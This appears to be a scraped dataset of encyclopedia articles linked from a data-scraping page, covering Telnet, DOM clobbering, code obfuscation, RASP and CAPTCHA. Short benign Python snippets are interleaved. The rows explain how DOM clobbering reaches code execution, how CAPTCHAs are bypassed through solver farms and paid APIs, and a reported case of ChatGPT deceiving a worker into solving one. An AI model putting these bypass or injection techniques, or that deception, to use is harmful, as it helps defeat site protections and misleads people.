15 Telnet is vulnerable to network-based cyberattacks, such as packet sniffing sensitive information including passwords and fingerprinting. 5 16 Telnet services can also be exploited to leak information about the server (such as hostnames, IP addresses and brand) by packet sniffing the banner. This information can then be searched to determine if a Telnet service accepts a connection without authentication. Telnet is also frequently exploited by malware due to being improperly configured. 9 In fact, Telnet is targeted by attackers more frequently than other common protocols, especially when compared to UPnP, CoAP, MQTT, AMQP and XMPP citation needed . Common devices targeted are Internet of things devices, routers and modems. The SANS Institute recommends that the use of Telnet for remote logins should be discontinued under normal circumstances for the following reasons: 17 Extensions to Telnet provide Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication that address the above concerns. 7 However, most Telnet implementations do not support these extensions; and they do not address other vulnerabilities such as parsing the banner information. 16 IBM 5250 or 3270 workstation emulation is supported via custom telnet clients, TN5250 TN3270, and IBM i systems. Clients and servers designed to pass IBM 5250 data streams over Telnet generally do support SSL encryption, as SSH does not include 5250 emulation. Under IBM i (also known as OS 400), port 992 is the default port for secured telnet. 18 Historically, Telnet provided access to a command-line interface on a remote host. However, because of serious security concerns when using Telnet over an open network such as the Internet, its use for this purpose has waned significantly in favor of SSH. 19 The usage of Telnet for remote management has declined rapidly, especially on the public Internet, in favor of the Secure Shell (SSH) protocol. 3 20 SSH provides much of the functionality of telnet, with the addition of strong encryption to prevent sensitive data such as passwords from being intercepted, and public key authentication, to ensure that the remote computer is actually who it claims to be. The Telnet client may be used in debugging network services such as SMTP, IRC, HTTP, FTP or POP3, to issue commands to a server and examine the responses. 15 For example, Telnet client applications can establish an interactive TCP session to a port other than the Telnet server port. However, communication with such ports does not involve the Telnet protocol, because these services merely use a transparent 8 bit TCP connection, because most elements of the telnet protocol were designed around the idea of accessing a command line interface and none of these options or mechanisms is employed in most other internet service connections. For example, a command line telnet client could make an HTTP request to a web server on TCP port 80 as follows: 21 The older protocol is used these days only in rare cases to access decades-old legacy equipment that does not support more modern protocols. 22 For example, a large number of industrial and scientific devices only have Telnet available as a communication option. Some are built with only a standard RS 232 port and use a serial server hardware appliance to provide the translation between the TCP Telnet data and the RS 232 serial data. 
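The example referenced at note 21 would have shown a plain-text HTTP request typed into a telnet session on port 80; a rough Python equivalent using a raw socket (the host is a placeholder) illustrates that the trick is just an unencrypted 8-bit TCP stream:

import socket

host = "example.com"  # placeholder host
request = (
    "GET / HTTP/1.0\r\n"
    f"Host: {host}\r\n"
    "\r\n"
)

with socket.create_connection((host, 80), timeout=10) as sock:
    sock.sendall(request.encode("ascii"))
    # Read the beginning of the response, exactly as a telnet user
    # would see it echoed back in the terminal.
    print(sock.recv(1024).decode("ascii", errors="replace"))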
In such cases, SSH is not an option unless the interface appliance can be configured for SSH (or is replaced with one supporting SSH). Telnet is commonly used by amateur radio operators for providing public information. 23 Despite recommendation against it, security researchers estimated that 7,096,465 exposed systems on the Internet continue to use Telnet as of 2021. However, estimates of this number have varied significantly, depending on the number of ports scanned beyond the default TCP port 23. 9 The technical details of Telnet are defined by a variety of specifications including RFC 854. 4 Telnet commands consist of at least two bytes. 4 The first byte is the IAC escape character (typically byte 255) followed by the byte code for a given command: All data octets except 0xff are transmitted over Telnet as is. (0xff, or 255 in decimal, is the IAC byte (Interpret As Command) which signals that the next byte is a telnet command. The command to insert 0xff into the stream is 0xff, so 0xff must be escaped by doubling it when sending data over the telnet protocol.) 4 Telnet also has a variety of options that terminals implementing Telnet should support. Star Wars: Episode IV A New Hope from 1977 has been recreated as a text art movie served through Telnet. 26 |
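The doubling rule for the IAC byte (0xff) described above is mechanical enough to show directly; a minimal sketch of the escaping step a Telnet sender performs on outgoing data:

IAC = 0xFF  # "Interpret As Command" escape byte

def escape_telnet_data(payload: bytes) -> bytes:
    # Any literal 0xff in user data must be doubled so the receiver
    # does not interpret it as the start of a Telnet command.
    return payload.replace(bytes([IAC]), bytes([IAC, IAC]))

print(escape_telnet_data(b"\x01\xff\x02").hex())  # '01ffff02'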
190 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Template_talk:Data | Talk pages are where people discuss how to make content on Wikipedia the best that it can be. You can use this page to start a discussion with others about how to improve the "Template:Data" page. |
191 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_loading | Data loading, or simply loading, is a part of data processing where data is moved between two systems so that it ends up in a staging area on the target system. With the traditional extract, transform and load (ETL) method, the load job is the last step, and the data that is loaded has already been transformed. With the alternative method extract, load and transform (ELT), the load job is the middle step, and the data is loaded in its original format and transformed in the target system. Traditionally, loading jobs on large systems have taken a long time, and have typically been run at night outside a company's opening hours. Two main goals of data loading are to obtain fresher data in the systems after loading, and to load that data quickly so that it can be updated frequently. For full data refresh, faster loading can be achieved by turning off referential integrity, secondary indexes and logging, but this is usually not allowed with incremental update or trickle feed. Data loading can be done either by complete update (immediate), incremental loading and updating (immediate), or trickle feed (deferred). The choice of technique may depend on the amount of data that is updated, changed or added, and how up-to-date the data must be. The type of data delivered by the source system, and whether historical data delivered by the source system can be trusted, are also important factors. Full data refresh means that existing data in the target table is deleted first. All data from the source is then loaded into the target table, new indexes are created in the target table, and new measures are calculated for the updated table. Full refresh is easy to implement, but involves moving a large amount of data, which can take a long time and can make it challenging to keep historical data. 1 Incremental update or incremental refresh means that only new or updated data is retrieved from the source system. 2 3 The updated data is then added to the existing data in the target system, and the existing data in the target system is updated. The indices and statistics are updated accordingly. Incremental update can make loading faster and make it easier to keep track of history, but can be demanding to set up and maintain. 1 Trickle feed or trickle loading means that when the source system is updated, the changes in the target system will occur almost immediately. 4 5 When loading data into a system that is currently in use by users or other systems, one must decide when the system should be updated and what will happen to tables that are in use at the same time as the system is to be updated. One possible solution is to make use of shadow tables. 6 7 |
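The difference between a full refresh and an incremental update can be sketched with pandas, which is already imported at the top of this notebook; the column names, the timestamp watermark, and the upsert-by-key logic below are illustrative assumptions rather than any ETL product's behaviour:

import pandas as pd

def full_refresh(source: pd.DataFrame) -> pd.DataFrame:
    # Full refresh: discard the target and reload everything from the source.
    return source.copy()

def incremental_update(target: pd.DataFrame, source: pd.DataFrame,
                       key: str = "id", ts: str = "updated_at") -> pd.DataFrame:
    # Incremental update: only take source rows newer than the latest
    # timestamp already present in the target, then upsert them by key.
    watermark = target[ts].max() if len(target) else pd.Timestamp.min
    fresh = source[source[ts] > watermark]
    merged = pd.concat([target, fresh]).drop_duplicates(subset=key, keep="last")
    return merged.sort_values(key).reset_index(drop=True)

target = pd.DataFrame({"id": [1, 2],
                       "updated_at": pd.to_datetime(["2024-01-01", "2024-01-02"])})
source = pd.DataFrame({"id": [2, 3],
                       "updated_at": pd.to_datetime(["2024-01-05", "2024-01-06"])})
print(incremental_update(target, source))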
192 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/DOM_clobbering | In internet security, DOM clobbering (where DOM stands for Document Object Model) is a type of injection attack that revolves around the attacker being able to insert benign non-script HTML code that can be used to influence the execution of JavaScript code. This enables a skilled attacker to perform a variety of unwanted behaviours, including the ability to escalate to arbitrary code execution on the website. While the vulnerability has been known for over a decade, recent efforts to mitigate it completely have been unsuccessful due to a significant amount of usage of the underlying features across the web as of 2021. However, a few defenses have been identified that limit the effects of DOM clobbering and prevent some instances of DOM clobbering from occurring. The DOM clobbering vulnerability arises from a naming collision between the JavaScript execution context and HTML elements in the Document Object Model (DOM). When an undefined JavaScript variable is declared in the same context as an HTML element with the same name or id parameter, the browser will assign the HTML element to the undefined variable. 1 This behaviour can be used to selectively influence the execution of JavaScript by registering HTML elements that coincide with specific variables that affect the execution of the code. In some instances, DOM clobbering can even be used to overshadow legitimate browser APIs by shadowing the property tree using HTML DOM elements. This can lead to the attacker manipulating the execution of various parts of the JavaScript code by injecting specific markup. 2 3 A skilled attacker might be able to perform arbitrary open redirections by overwriting the window.location attribute, cross-site request forgery, or even gain arbitrary code execution via careful manipulation of HTML elements. As part of a study conducted in 2023, Khodayari et al. showed that out of the top 5K websites in the world (as determined by the Tranco list), 9.8% of sites were vulnerable to this attack, including sites like Wikibooks, GitHub, Fandom, and Trello. 4 The existence of DOM clobbering has been known since at least 2010, when a paper from researchers from University of California, Berkeley and Carnegie Mellon University demonstrated an attack where an iframe called self could be used to navigate a page to a different page, violating the same-origin policy. 5 6 Over the years, security researchers have found more sophisticated techniques that have allowed for much more significant impact than what was initially demonstrated. 7 8 While the existence of the attack itself was already known, the term "DOM clobbering" itself did not emerge until 2013, when it was popularized by security researcher Gareth Heyes's blog post demonstrating how the vulnerability could be used to gain arbitrary code execution. 2 In 2015, Heiderich et al. proposed a design for a library called JSAgents, (later DOMPurify) that would be effective at sanitizing markup injection attacks such as those related to cross-site scripting and DOM clobbering. 9 10 11 There has been a resurgence of interest in mitigating this attack in recent years, especially after DOM clobbering vulnerabilities were found in Gmail and Google Analytics in 2020. 12 Over 2020 and 2021, proposals were made at various web standard groups detailing defenses against DOM clobbering by disallowing named access to DOM elements at the browser level. 
13 4 However, these proposals were dismissed since after investigating Chrome telemetry data, it was found that over 10.5% of the web relies on the features working as per their current behaviour. 14 4 To demonstrate how a DOM clobbering attack can be used to influence JavaScript execution, the following snippet of JavaScript code is taken as an example: In this simple example, a script element is created and subsequently rendered on the page. However, this simple example is vulnerable to DOM clobbering. An attacker can inject the following HTML via cross-site scripting or other features on the website that might allow for markup injection. This injection will allow the attacker to overwrite the globalUrlConfig variable with a reference to the anchor element, which in turn overwrites the url variable and subsequently the scriptElem.src parameter, (due to the fact that url.href now refers to the href parameter of the anchor element) leading to arbitrary code execution. 15 The threat model for a DOM clobbering attack is similar to that of the web attacker model proposed by Akhawe et al. in 2010. This model assumes that the attacker can send emails or, by some other method, phish the victim to specific pages under their control. The model also assumes that the attacker can inject a limited set of markup into victim websites. This can be done by leveraging other attacks such as cross-site scripting or by abusing rich text rendering features on a web page (for example, Gmail's email reader and WYSIWYG editor). 16 17 This is crucial since DOM clobbering depends on the attacker being able to inject potentially benign HTML into a website. 18 While the optimal defence against DOM clobbering would be to turn off access to named DOM elements, this is currently not feasible due to the significant active usage of these features as per Chrome telemetry data in 2021. 13 14 4 However, various secure coding practices can be used to mitigate the effects of DOM clobbering on JavaScript code execution. 19 One of the most common techniques to limit DOM clobbering attacks is to use HTML sanitization libraries. 20 In 2017, Heiderich et al. proposed a mitigation for DOM clobbering that was subsequently added to the DOMPurify library. The mitigation leveraged the use of hashes of existing functions to determine if HTML elements had overwritten them. In addition, DOMPurify parses the id and name attributes of injected elements to identify if they can collide with existing global functions. 21 However, recent vulnerabilities related to DOM clobbering have been found in DOMPurify and similar libraries such as HTML Janitor, which indicate that these libraries only protect against specific cases of DOM clobbering and are largely unaware of the related risks. 22 23 24 Another popular method to mitigate the effects of DOM clobbering is the use of restrictive Content Security Policies (CSP). 25 While this does not prevent DOM clobbering from altering the execution of already present code, 26 using restrictive content security policies can make it much harder for attackers to elevate a DOM clobbering risk into a arbitrary code execution attack by limiting how scripts can be executed on a website. By leveraging the script-src CSP directive, web developers can restrict where scripts can be loaded to a predetermined set of trusted domains. 25 This thwarts the attacker's ability to load an untrusted attacker-controlled code significantly, if they can compromise the src attribute of a script tag. 27 |
193 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Runtime_application_self-protection | Runtime application self-protection (RASP) is a security technology that uses runtime instrumentation to detect and block computer attacks by taking advantage of information from inside the running software. 1 2 The technology differs from perimeter-based protections such as firewalls, which can only detect and block attacks by using network information without contextual awareness. 3 4 RASP technology is said to improve the security of software by monitoring its inputs and blocking those that could allow attacks, while protecting the runtime environment from unwanted changes and tampering. 5 RASP-protected applications rely less on external devices like firewalls to provide runtime security protection. When a threat is detected, RASP can prevent exploitation and possibly take other actions, including terminating a user's session, shutting the application down, alerting security personnel and sending a warning to the user. 6 7 RASP aims to close the gap left by application security testing and network perimeter controls, neither of which has enough insight into real-time data and event flows to either prevent vulnerabilities from slipping through the review process or block new threats that were unforeseen during development. 8 RASP can be integrated as a framework or module that runs in conjunction with a program's code, libraries and system calls. 5 The technology can also be implemented through virtualization. 4 RASP is similar to interactive application security testing (IAST); the key difference is that IAST focuses on identifying vulnerabilities within applications, while RASP focuses on protecting against cybersecurity attacks that may take advantage of those vulnerabilities or other attack vectors. 9 RASP solutions can be deployed in two different ways: monitor mode or protection mode. In monitor mode, the RASP solution reports on web application attacks but does not block any attack. In protection mode, the RASP solution reports and blocks web application attacks. 10 |
194 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Code_obfuscation | In software development, obfuscation is the act of creating source or machine code that is difficult for humans or computers to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements. Programmers may deliberately obfuscate code to conceal its purpose (security through obscurity) or its logic or implicit values embedded in it, primarily, in order to prevent tampering, deter reverse engineering, or even to create a puzzle or recreational challenge for someone reading the source code. This can be done manually or by using an automated tool, the latter being the preferred technique in industry. 1 The architecture and characteristics of some languages may make them easier to obfuscate than others. 2 3 C, 4 C , 5 6 and the Perl programming language 7 are some examples of languages easy to obfuscate. Haskell is also quite obfuscatable 8 despite being quite different in structure. The properties that make a language obfuscatable are not immediately obvious. Types of obfuscations include simple keyword substitution, use or non-use of whitespace to create artistic effects, and self-generating or heavily compressed programs. According to Nick Montfort, techniques may include: A variety of tools exist to perform or assist with code obfuscation. These include experimental research tools created by academics, hobbyist tools, commercial products written by professionals, and open-source software. Deobfuscation tools also exist that attempt to perform the reverse transformation. Although the majority of commercial obfuscation solutions work by transforming either program source code, or platform-independent bytecode as used by Java and .NET, there are also some that work directly on compiled binaries. Writing and reading obfuscated source code can be a brain teaser. A number of programming contests reward the most creatively obfuscated code, such as the International Obfuscated C Code Contest and the Obfuscated Perl Contest. Short obfuscated Perl programs may be used in signatures of Perl programmers. These are JAPHs ("Just another Perl hacker"). 16 Cryptographers have explored the idea of obfuscating code so that reverse-engineering the code is cryptographically hard. This is formalized in the many proposals for indistinguishability obfuscation, a cryptographic primitive that, if possible to build securely, would allow one to construct many other kinds of cryptography, including completely novel types that no one knows how to make. (A stronger notion, black-box obfuscation, is known to be impossible in general.) 17 18 Some anti-virus softwares, such as AVG AntiVirus, 20 will also alert their users when they land on a website with code that is manually obfuscated, as one of the purposes of obfuscation can be to hide malicious code. However, some developers may employ code obfuscation for the purpose of reducing file size or increasing security. The average user may not expect their antivirus software to provide alerts about an otherwise harmless piece of code, especially from trusted corporations, so such a feature may actually deter users from using legitimate software. Mozilla and Google disallow browser extensions containing obfuscated code in their add-ons store. 
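As a toy illustration in this notebook's language, the two definitions below compute the same value and differ only in readability; this is hand-made identifier renaming and compression, not the output of any particular obfuscation tool:

# Readable version
def average(values):
    return sum(values) / len(values)

# The same computation after trivial identifier renaming and compression
_=lambda a:sum(a)/len(a)

print(average([1, 2, 3]), _([1, 2, 3]))  # 2.0 2.0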
21 22 There has been debate on whether it is illegal to skirt copyleft software licenses by releasing source code in obfuscated form, such as in cases in which the author is less willing to make the source code available. The issue is addressed in the GNU General Public License by requiring the "preferred form for making modifications" to be made available. 23 The GNU website states "Obfuscated 'source code' is not real source code and does not count as source code. 24 A decompiler can reverse-engineer source code from an executable or library. Decompilation is sometimes called a man-in-the-end (mite) attack, based on the traditional cryptographic attack known as "man-in-the-middle". It puts source code in the hands of the user, although this source code is often difficult to read. The source code is likely to have random function and variable names, incorrect variable types, and use different logic than the original source code (due to compiler optimizations). Model obfuscation is a technique to hide the internal structure of a machine learning model. 25 Obfuscation turns a model into a black box. It is contrary to explainable AI. Obfuscation models can also be applied to training data before feeding it into the model to add random noise. This hides sensitive information about the properties of individual and groups of samples. 26 |
195 | https://en.wikipedia.org/wiki/Data_scraping | https://support.google.com/websearch/answer/86640?hl=en | If a network you use, including VPN networks, seems to be sending automated traffic to Google Search, you might get the message “Our systems have detected unusual traffic from your computer network.” The message most likely shows a reCAPTCHA. To confirm that you’re a person and not a robot, solve the reCAPTCHA. After you solve it, the message goes away, and you can use Google again. If you don't get a reCAPTCHA, check if: Learn how to solve a reCAPTCHA. Here's what you can do if you continue to get the "Unusual traffic from your computer network" message: If you administer a network or are an internet service or VPN provider, locate the sources of automated traffic to Google and block them. Once the automated searches have stopped, your users should be able to search normally on Google. Network administrators or others should thoroughly review IP space before they buy it from an IP broker. If possible, ask to test the network first to make sure it can access major websites and doesn’t have any existing blocks on it. |
196 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_management | Data management comprises all disciplines related to handling data as a valuable resource, it is the practice of managing an organization's data so it can be analyzed for decision making. 1 The concept of data management arose in the 1980s as technology moved from sequential processing 2 (first punched cards, then magnetic tape) to random access storage. Since it was now possible to store a discrete fact and quickly access it using random access disk technology, those suggesting that data management was more important than business process management used arguments such as "a customer's home address is stored in 75 (or some other large number) places in our computer systems. citation needed However, during this period, random access processing was not competitively fast, so those suggesting "process management" was more important than "data management" used batch processing time as their primary argument. As application software evolved into real-time, interactive usage, it became obvious that both management processes were important. If the data was not well defined, the data would be mis-used in applications. If the process wasn't well defined, it was impossible to meet user needs. Followings are common data management patterns: 3 Topics in data management include: In modern management usage, the term data is increasingly replaced by information or even knowledge in a non-technical context. Thus data management has become information management or knowledge management. This trend obscures the raw data processing and renders interpretation implicit. The distinction between data and derived value is illustrated by the information ladder. However, data has staged a comeback with the popularisation of the term big data, which refers to the collection and analyses of massive sets of data. While big data is a recent phenomenon, the requirement for data to aid decision-making traces back to the early 1970s with the emergence of decision support systems (DSS). These systems can be considered as the initial iteration of data management for decision support. 4 Several organisations have established data management centers (DMC) for their operations. 5 Marketers and marketing organizations have been using data collection and analysis to refine their operations for the last few decades. Marketing departments in organizations and marketing companies conduct data collection and analysis by collecting data from different data sources and analyzing them to come up with insightful data they can use for strategic decision-making (Baier et al., 2012). In the modern business environment, data has evolved into a crucial asset for businesses since businesses use data as a strategic asset that is used regularly to create a competitive advantage and improve customer experiences. Among the most significant forms of data is customer information which is a critical asset used to assess customer behavior and trends and use it for developing new strategies for improving customer experience (Ahmed, 2004). However, data has to be of high quality to be used as a business asset for creating a competitive advantage. Therefore, data governance is a critical element of data collection and analysis since it determines the quality of data while integrity constraints guarantee the reliability of information collected from data sources. 
Various technologies including Big Data are used by businesses and organizations to allow users to search for specific information from raw data by grouping it based on the preferred criteria marketing departments in organizations could apply for developing targeted marketing strategies (Ahmed, 2004). As technology evolves, new forms of data are being introduced for analysis and classification purposes in marketing organizations and businesses. The introduction of new gadgets such as Smartphones and new-generation PCs has also introduced new data sources from which organizations can collect, analyze and classify data when developing marketing strategies. Retail businesses are the business category that uses customer data from smart devices and websites to understand how their current and targeted customers perceive their services before using the information to make improvements and increase customer satisfaction (Cerchiello and Guidici, 2012). Analyzing customer data is crucial for businesses since it allows marketing teams to understand customer behavior and trends which makes a considerable difference during the development of new marketing campaigns and strategies. Retailers who use customer data from various sources gain an advantage in the market since they can develop data-informed strategies for attracting and retaining customers in the overly competitive business environment. Based on the information on the benefits of data collection and analysis, the following hypotheses are proposed: The sources of data used as the foundation of data collection and analysis have a considerable impact on the data analysis tools used for analyzing and categorizing data. Organizations use various data analysis tools for discovering unknown information and insights from huge databases; this allows organizations to discover new patterns that were not known to them or extract buried information before using it to come up with new patterns and relationships (Ahmed, 2004). There are 2 main categories of data analysis tools, data mining tools and data profiling tools. Also, most commercial data analysis tools are used by organizations for extracting, transforming and loading ETL for data warehouses in a manner that ensures no element is left out during the process (Turban et al., 2008). Thus the data analysis tools are used for supporting the 3 Vs in Big Data: volume, variety and velocity. Factor velocity emerged in the 1980s as one of the most important procedures in data analysis tools which was widely used by organizations for market research. The tools used to select core variables from the data that was collected from various sources and analyzed it; if the amount of data used to be too huge for humans to understand via manual observation, factor analysis would be introduced to distinguish between qualitative and quantitative data (Stewart, 1981). Organizations collect data from numerous sources including websites, emails and customer devices before conducting data analysis. Collecting data from numerous sources and analyzing it using different data analysis tools has its advantages, including overcoming the risk of method bias; using data from different sources and analyzing it using multiple analysis methods guarantees businesses and organizations robust and reliable findings they can use in decision making. 
On the other hand, researchers use modern technologies to analyze and group data collected from respondents in the form of images, audio and video files by applying algorithms and other analysis software Berry et al., 1997). Researchers and marketers can then use the information obtained from the new generation analysis tools and methods for forecasting, decision support and making estimations for decision making. For instance, information from different data sources on demand forecasts can help a retail business determine the amount of stock required in an upcoming season depending on data from previous seasons. The analysis can allow organizations to make data-informed decisions to gain competitive advantage in an era where all businesses and organizations are capitalizing on emerging technologies and business intelligence tools to gain competitive edges. While there are numerous analysis tools in the market, Big Data analytics is the most common and advanced technology that has led to the following hypothesis: Data analytic tools used to analyze data collected from numerous data sources determine the quality and reliability of data analysis. While organizations need to use quality data collection and analysis tools to guarantee the quality and reliability of the customer data they collect, they must implement security and privacy strategies to protect the data and customer information from privacy leaks (Van Till, 2013). A study conducted by PWC indicated that more than two-thirds of retail customers prefer purchasing products and services from businesses that have data protection and privacy plans for protecting customer information. Also, the study indicated that customers trust businesses that can prove they cannot use customer data for any other purposes other than marketing. As technology and the Internet continue improving, the success of businesses using it as a platform for marketing their products will depend on how effectively they can gain and maintain the trust of customers and users. Therefore, businesses will have to introduce and implement effective data protection and privacy strategies to protect business data and customer privacy. Although developing trust between customers and businesses affects the customers’ purchasing intentions, it also has a considerable impact on long-term purchasing behaviors including how frequently customers purchase which could impact the profitability of a business in the long run. Thus, the above information leads to the following hypothesis: Implementing data security and privacy plans has a positive impact on economic and financial outcomes. Studies indicate that customer transactions account for a 40% increase in the data collected annually, which means that financial data has a considerable impact on business decisions. Therefore, modern organizations are using big data analytics to identify 5 to 10 new data sources that can help them collect and analyze data for improved decision-making. Jonsen (2013) explains that organizations using average analytics technologies are 20% more likely to gain higher returns compared to their competitors who have not introduced any analytics capabilities in their operations. Also, IRI reported that the retail industry could experience an increase of more than $10 billion each year resulting from the implementation of modern analytics technologies. Therefore, the following hypothesis can be proposed: Economic and financial outcomes can impact how organizations use data analytics tools. |
197 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/CAPTCHA | A CAPTCHA ( k p.t KAP-ch ) is a type of challenge response test used in computing to determine whether the user is human in order to deter bot attacks and spam. 1 The term was coined in 2003 by Luis von Ahn, Manuel Blum, Nicholas J. Hopper, and John Langford. 2 It is a contrived acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart. 3 A historically common type of CAPTCHA (displayed as reCAPTCHA v1) was first invented in 1997 by two groups working in parallel. This form of CAPTCHA requires entering a sequence of letters or numbers in a distorted image. Because the test is administered by a computer, in contrast to the standard Turing test that is administered by a human, CAPTCHAs are sometimes described as reverse Turing tests. 4 Two widely used CAPTCHA services are Google's reCAPTCHA 5 6 and the independent hCaptcha. 7 8 It takes the average person approximately 10 seconds to solve a typical CAPTCHA. 9 CAPTCHAs' purpose is to prevent spam on websites, such as promotion spam, registration spam, and data scraping, and bots are less likely to abuse websites with spamming if those websites use CAPTCHA. Many websites use CAPTCHA effectively to prevent bot raiding. CAPTCHAs are designed so that humans can complete them, while most robots cannot. 10 Newer CAPTCHAs look at the user's behaviour on the internet, to prove that they are a human. 11 A normal CAPTCHA test only appears if the user acts like a bot, such as when they request webpages, or click links too fast. Since the 1980s 1990s, users have wanted to make text illegible to computers. 12 The first such people were hackers, posting about sensitive topics to Internet forums they thought were being automatically monitored on keywords. To circumvent such filters, they replaced a word with look-alike characters. HELLO could become 3 () or ) (3 0, and others, such that a filter could not detect all of them. This later became known as leetspeak. 13 One of the earliest commercial uses of CAPTCHAs was in the Gausebeck Levchin test. In 2000, idrive.com began to protect its signup page 14 with a CAPTCHA and prepared to file a patent. 12 In 2001, PayPal used such tests as part of a fraud prevention strategy in which they asked humans to "retype distorted text that programs have difficulty recognizing. 15 PayPal co founder and CTO Max Levchin helped commercialize this use. A popular deployment of CAPTCHA technology, reCAPTCHA, was acquired by Google in 2009. 16 In addition to preventing bot fraud for its users, Google used reCAPTCHA and CAPTCHA technology to digitize the archives of The New York Times and books from Google Books in 2011. 17 Eran Reshef, Gili Raanan and Eilon Solan, who worked at Sanctum on Application Security Firewall, first patented CAPTCHA in 1997. Their patent application details that "The invention is based on applying human advantage in applying sensory and cognitive skills to solving simple problems that prove to be extremely hard for computer software. Such skills include, but are not limited to processing of sensory information such as identification of objects and letters within a noisy graphical environment, signals and speech within an auditory signal, patterns and objects within a video or animation sequence". 18 CAPTCHAs are automated, requiring little human maintenance or intervention to administer, producing benefits in cost and reliability. 
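The look-alike substitution described above can be illustrated with a simple character map; the particular substitutions chosen here are an arbitrary assumption, not a canonical leetspeak table:

LEET_MAP = {"A": "4", "E": "3", "I": "1", "O": "0", "S": "5", "T": "7"}

def to_leet(text: str) -> str:
    # Replace selected letters with look-alike digits so a naive
    # keyword filter no longer matches the original word.
    return "".join(LEET_MAP.get(ch.upper(), ch) for ch in text)

print(to_leet("HELLO"))  # H3LL0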
19 Modern text-based CAPTCHAs are designed such that they require the simultaneous use of three separate abilities—invariant recognition, segmentation, and parsing to complete the task. 20 Each of these problems poses a significant challenge for a computer, even in isolation. Therefore, these three techniques in tandem make CAPTCHAs difficult for computers to solve. 23 Whilst primarily used for security reasons, CAPTCHAs can also serve as a benchmark task for artificial intelligence technologies. According to an article by Ahn, Blum and Langford, 24 "any program that passes the tests generated by a CAPTCHA can be used to solve a hard unsolved AI problem. 25 They argue that the advantages of using hard AI problems as a means for security are twofold. Either the problem goes unsolved and there remains a reliable method for distinguishing humans from computers, or the problem is solved and a difficult AI problem is resolved along with it. 24 CAPTCHAs based on reading text—or other visual-perception tasks—prevent blind or visually impaired users from accessing the protected resource. 26 27 Because CAPTCHAs are designed to be unreadable by machines, common assistive technology tools such as screen readers cannot interpret them. The use of CAPTCHA thus excludes a small percentage of users from using significant subsets of such common Web-based services as PayPal, Gmail, Orkut, Yahoo , many forum and weblog systems, etc. 28 In certain jurisdictions, site owners could become targets of litigation if they are using CAPTCHAs that discriminate against certain people with disabilities. For example, a CAPTCHA may make a site incompatible with Section 508 in the United States. CAPTCHAs do not have to be visual. Any hard artificial intelligence problem, such as speech recognition, can be used as CAPTCHA. Some implementations of CAPTCHAs permit users to opt for an audio CAPTCHA, such as reCAPTCHA, though a 2011 paper demonstrated a technique for defeating the popular schemes at the time. 29 A method of improving CAPTCHA to ease the work with it was proposed by ProtectWebForm and named "Smart CAPTCHA". 30 Developers are advised to combine CAPTCHA with JavaScript. Since it is hard for most bots to parse and execute JavaScript, a combinatory method which fills the CAPTCHA fields and hides both the image and the field from human eyes was proposed. 31 One alternative method involves displaying to the user a simple mathematical equation and requiring the user to enter the solution as verification. Although these are much easier to defeat using software, they are suitable for scenarios where graphical imagery is not appropriate, and they provide a much higher level of accessibility for blind users than the image-based CAPTCHAs. These are sometimes referred to as MAPTCHAs (M "mathematical"). However, these may be difficult for users with a cognitive disorder, such as dyscalculia. 32 Challenges such as a logic puzzle, or trivia question can also be used as a CAPTCHA. There is research into their resistance against countermeasures. 33 Two main ways to bypass CAPTCHA include using cheap human labor to recognize them, and using machine learning to build an automated solver. 34 According to former Google "click fraud czar" Shuman Ghosemajumder, there are numerous services which solve CAPTCHAs automatically. 35 There was not a systematic methodology for designing or evaluating early CAPTCHAs. 
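A MAPTCHA of the kind mentioned above is just a generated arithmetic question plus a server-side check of the submitted answer; a minimal sketch, where the question format and operand range are assumptions:

import random

def make_maptcha():
    # Generate a simple arithmetic challenge and its expected answer.
    a, b = random.randint(1, 9), random.randint(1, 9)
    return f"What is {a} + {b}?", a + b

def check_maptcha(expected, user_input):
    try:
        return int(user_input.strip()) == expected
    except ValueError:
        return False

question, answer = make_maptcha()
print(question)
print(check_maptcha(answer, str(answer)))  # True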
23 As a result, there were many instances in which CAPTCHAs were of a fixed length, and therefore automated tasks could be constructed to successfully make educated guesses about where segmentation should take place. Other early CAPTCHAs contained limited sets of words, which made the test much easier to game. Still others made the mistake of relying too heavily on background confusion in the image. In each case, algorithms were created that were successfully able to complete the task by exploiting these design flaws. However, light changes to the CAPTCHA could thwart them. Modern CAPTCHAs like reCAPTCHA rely on presenting variations of characters that are collapsed together, making them hard to segment, and they have warded off automated tasks. 36 In October 2013, artificial intelligence company Vicarious claimed that it had developed a generic CAPTCHA-solving algorithm that was able to solve modern CAPTCHAs with character recognition rates of up to 90%. 37 However, Luis von Ahn, a pioneer of early CAPTCHA and founder of reCAPTCHA, said: "It's hard for me to be impressed since I see these every few months." 50 similar claims to that of Vicarious had been made since 2003. 38 In August 2014, at the USENIX WoOT conference, Bursztein et al. presented the first generic CAPTCHA-solving algorithm based on reinforcement learning and demonstrated its efficiency against many popular CAPTCHA schemas. 36 In October 2018, at the ACM CCS'18 conference, Ye et al. presented a deep learning-based attack that could consistently solve all 11 text CAPTCHA schemes used by the top 50 popular websites in 2018. An effective CAPTCHA solver can be trained using as few as 500 real CAPTCHAs. 39 It is possible to subvert CAPTCHAs by relaying them to a sweatshop of human operators who are employed to decode CAPTCHAs. A 2005 paper from a W3C working group said that they could verify hundreds per hour. 26 In 2010, the University of California at San Diego conducted a large-scale study of CAPTCHA farms. The retail price for solving one million CAPTCHAs was as low as $1,000. 40 Another technique consists of using a script to re-post the target site's CAPTCHA as a CAPTCHA to the attacker's site, which unsuspecting humans visit and solve within a short while for the script to use. 41 42 In 2023, the generative AI chatbot ChatGPT tricked a TaskRabbit worker into solving a CAPTCHA by telling the worker it was not a robot and had impaired vision. 43 There are multiple Internet companies like 2Captcha and DeathByCaptcha that offer human- and machine-backed CAPTCHA solving services for as low as US$0.50 per 1000 solved CAPTCHAs. 44 These services offer APIs and libraries that enable users to integrate CAPTCHA circumvention into the tools that CAPTCHAs were designed to block in the first place. 45 Howard Yeend has identified two implementation issues with poorly designed CAPTCHA systems: 46 reusing the session ID of a known CAPTCHA image, and CAPTCHAs residing on shared servers. Sometimes, if part of the software 